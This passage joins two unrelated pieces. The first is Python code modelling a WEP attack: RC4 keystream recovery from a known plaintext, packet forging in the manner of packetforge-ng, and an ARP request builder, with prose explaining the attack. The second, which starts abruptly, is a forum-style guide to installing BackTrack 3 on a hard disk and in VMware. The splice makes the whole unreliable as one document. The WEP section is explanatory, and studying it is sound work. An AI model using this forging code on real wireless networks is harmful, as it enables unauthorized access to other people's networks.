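    data = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(key: bytes, frame: bytes):
    """What the AP does on receipt: decrypt, check the ICV, return the
    plaintext or None (the frame is silently dropped)."""
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4(iv + key, len(body)))
    plaintext = data[:-4]
    return plaintext if icv(plaintext) == data[-4:] else None


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Keystream for this IV = ciphertext XOR (plaintext || ICV). This is what
    the .xor file holds; chopchop learns the plaintext one byte at a time by
    using the AP as an ICV oracle, here we simply assume it is known."""
    return frame[:3], xor(frame[4:], known_plaintext + icv(known_plaintext))


def forge(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """packetforge-ng: encrypt a fresh packet with a keystream we never derived
    from the key. It can only be as long as the keystream we have."""
    data = new_plaintext + icv(new_plaintext)
    if len(data) > len(keystream):
        raise ValueError("keystream too short for this packet")
    return iv + b"\x00" + xor(data, keystream)


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP who-has, the packet packetforge-ng -0 builds."""
    return bytes.fromhex("aaaa030000000806") + struct.pack(
        "!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1, sender_mac, sender_ip, b"\x00" * 6, target_ip)
```

Two things the code makes visible: the forged packet reuses the captured IV, which is legal in WEP and is the whole weakness, and a forged packet longer than the keystream cannot be built, which is why the ARP request (a small packet) is the one packetforge-ng is asked for. Flipping a ciphertext byte without fixing the ICV gets the frame dropped, so the AP's re-broadcast of the forged request is proof that the keystream was right.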

After several days of study and installation I made this final documentation of a comprehensive BackTrack 3 DVD installation with conflict-free dual booting. I assume you have already made the DVD ISO using make_iso.bat or the Linux shell script and burned the ISO to a DVD. I already have a separate partition for Linux which I created previously; you can free up space for a partition using any Windows utility like Paragon Partition Manager. I proceed further:

BackTrack 3 DVD Installation On Hard-Disk

Boot BackTrack 3 from the DVD.

After booting into KDE 3.5:
click the KDE menu
System Information
Storage Devices
Here you get a list of all mounted devices.
For a hassle-free installation it is necessary to unmount all the physical partitions, because by default BackTrack mounts all partitions after booting from the live DVD.

Choose a partition
right click and unmount it
(repeat for all mounted physical partitions)

For example, my hard-disk partition table is:

Now you have a rough idea which partitions are to be unmounted (e.g. hdc1, hda7, hda5, hda6, hda1, hdc5).

hda - first hard disk
hdc - second hard disk

I am assuming you are using hdc.

Open xterm:
bt~# fdisk /dev/hdc

p (view the partition table)

n (create a new partition; if at this point you get "no free sectors", delete one of the partitions (warning: all data on that partition will be lost))

p (primary)

1 (partition 1)

(press Enter to accept the default first cylinder)

+4200M (size of partition one, our root: it stores the system files and downloaded data)

n (new partition)

p (primary)

2 (partition 2)

(press Enter to accept the default first cylinder)

+64M (it will be our boot partition)

n (new partition)

p (primary)

3 (partition 3)

(press Enter to accept the default first cylinder)

+522M (swap partition, double the amount of system RAM)

p (newly created partition table)

t (change a partition's system id)

3 (that is our swap partition, by default set to 83, Linux)

82 (making hdc3 a swap partition by changing its id from 83 to 82)

p (check the partition table)

w (save changes)
(if at this point you get the warning "error 16: Device or resource busy ... the new table will be used at the next reboot", then REBOOT)

bt~# reboot (fdisk recommends this)

bt~# mke2fs /dev/hdc2
bt~# mkswap /dev/hdc3
bt~# swapon /dev/hdc3
bt~# mkreiserfs /dev/hdc1
choose (y/n) y
bt~# mkdir /mnt/backtrack
bt~# mount /dev/hdc1 /mnt/backtrack
bt~# mkdir /mnt/backtrack/boot
bt~# mount /dev/hdc2 /mnt/backtrack/boot
bt~# cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,srv,var} /mnt/backtrack
bt~# mkdir /mnt/backtrack/{mnt,proc,sys,tmp}
bt~# mount --bind /dev /mnt/backtrack/dev
bt~# mount -t proc proc /mnt/backtrack/proc
(If you get a "directory does not exist" error here, the mkdir above was typed without the slash before the brace group, which creates /mnt/backtrackmnt, /mnt/backtrackproc and so on instead of subdirectories. cd /mnt/backtrack and run mkdir {mnt,proc,sys,tmp} to create them in the right place.)
bt~# cp /boot/vmlinuz /mnt/backtrack/boot
bt~# chroot /mnt/backtrack /bin/bash
bt~# nano /etc/lilo.conf
(While in the chroot also check /etc/fstab: it must mount /dev/hdc1 on /, /dev/hdc2 on /boot and use /dev/hdc3 as swap, otherwise the installed system will not find them at boot.)

Configure LILO (find and change the following settings):
boot = /dev/hda (the disk whose MBR the BIOS boots from; check with fdisk -l /dev/hda or /dev/hdc: the partition flagged with * is the active one on that disk)

timeout=1200 (timeout for the LILO boot menu, in tenths of a second)

#linux config ...
image = /boot/vmlinuz
root = /dev/hdc1 (this is your root partition, the biggest one you created)
label = BaCkTrAcK3(I33t)
other = /dev/hda1
label = WindowsOs(n00b) (here comes the MS n00b OS, full of bugs, lol)
table = /dev/hda (disk where your Microsoft OS resides)

Save using ctrl + o and press enter,
exit using ctrl + x.
bt~/# cd /
bt~# lilo -v (remember, this is a very important step: it writes the boot loader with both operating systems in its menu. If it goes well you have successfully installed the BackTrack 3 DVD version on your hard disk, dual booting with the Microsoft OS.)
bt~# init 6
Installation of BT 3 on VMware
I got a tutorial on BT3 installation on VMware; thanks to the respective member. I am modifying it a little to make it more comprehensive.

Tested using VMware Workstation 6.0.0 build-45371
Guest OS: Linux
Version: Other Linux 2.6.x kernel
Networking: choose bridged or NAT
Disk capacity: recommended 7-8 GB
Now edit the settings for this VM:
Memory: 128 MB (if system RAM = 256 MB)
192/256 MB (if system RAM = 512 MB)
CD-ROM: if booting from an ISO stored on the hard disk, choose its location; otherwise leave the default physical DVD drive.

Boot BT3.
Open xterm:
bt~# fdisk /dev/sda
(create the partitions the same way as above: sda1 for the root filesystem and sda2 with id 82 for swap)
(if at this point you get the warning "error 16: Device or resource busy ... the new table will be used at the next reboot", then REBOOT)
bt~# init 6
bt~# mkfs.ext3 /dev/sda1
bt~# mkswap /dev/sda2
bt~# mkdir /mnt/backtrack
bt~# mount /dev/sda1 /mnt/backtrack

Go to KDE menu -> BackTrack -> Install BackTrack (not tested)
Source (BackTrack CD):
Install BackTrack to: /mnt/backtrack
Write new MBR (lilo.mbr) to: /dev/sda
Installation method: Real
Uncheck "Restore original MBR after lilo" (it is very important to UNCHECK this, else your whole hard work will go in vain)
Press Install.
Hang out outside thinking about how many tools you are going to work with on BT3, for about 30-40 minutes.
After the installation:
Reboot using KDE menu -> Logoff -> Reboot